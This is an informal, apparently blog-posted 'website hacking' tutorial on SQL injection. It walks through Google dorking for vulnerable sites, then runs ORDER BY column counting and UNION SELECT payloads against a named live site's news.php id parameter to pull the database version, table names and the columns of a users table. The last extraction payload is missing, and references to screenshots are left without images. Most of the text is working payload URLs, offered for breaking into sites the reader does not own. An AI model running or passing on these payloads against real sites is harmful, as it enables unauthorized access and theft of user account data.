SQL Injection Complete Tutorial [Website Hacking]

Okay first find a volnuerable website
to get volnerable websites
open google.com
and type one of these dorks


well there is a huge list of google dorks
you can get these from google

when you type one of the google dork..thousands of sites
will be searched
now open a website and type ' at the end of url
if you get this error

Then the website is vuln and you can try to hack it

okay now that you have this error

now you need to find number of columns

now remove ' and type

order by 1(syntax)
now your url will be like
www.brew-monkey.com/news.php?id=465 order by 1

if you dont get any error then increase number
www.brew-monkey.com/news.php?id=465 order by 2 (no error)
www.brew-monkey.com/news.php?id=465 order by 3 (no error)
www.brew-monkey.com/news.php?id=465 order by 4 (no error)
www.brew-monkey.com/news.php?id=465 order by 5 (no error)

www.brew-monkey.com/news.php?id=465 order by 6
ohh error came here

Unknown column '6' in 'order clause'

so you have this number of columns in this website is 5

now its time to use union all select statement

oka as we know our website has 5 columns
now wee need to find vunl columns

for that use this syntax

www.brew-monkey.com/news.php?id=465 union all select 1,2,3,4,5--

now see the pic 3

here you can clearly see some bold numbers

in this website the number is 3

that mean string column is 3


now lets check the MySql version of the website

to check this you need to replace your url with

?id=465 union all select 1,2,@@version,4,5--

oka now see the pic 4

you can clearly see in this pic that

where the column number was written, now there is some changing and that is the
database version

okay if the number is greater than or = 5 then its good
because its easy to crack
if its below then you the sql injection is blind
(it does not mean that you cant crack the db but we have to guess
the table names and all )
so now as we have checked this
now we gonna crack its db
lets find the tables of this database
oka now replace the url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()

if it does not work then use

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

wow see the pic 5 below

we have all its table now

now we have to check its tables and find some table with sensitive information

it may be admin , users , usergroups etc

okay so here im trying to crack this table


oka so now we need to replace our url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users

install hackbar (adds on of firefox) as i have
now click on sql >mysql>Mysqlchar
and type the table name
then you wil get its value

now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

oka copy it and replace the url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

well its working

see pic 6

now we need to fetch data of columns

now in this website
the information is in columns


oka to fetch these

replace the url with



we have done it guyz..

there are 3 users in this database



Post a Comment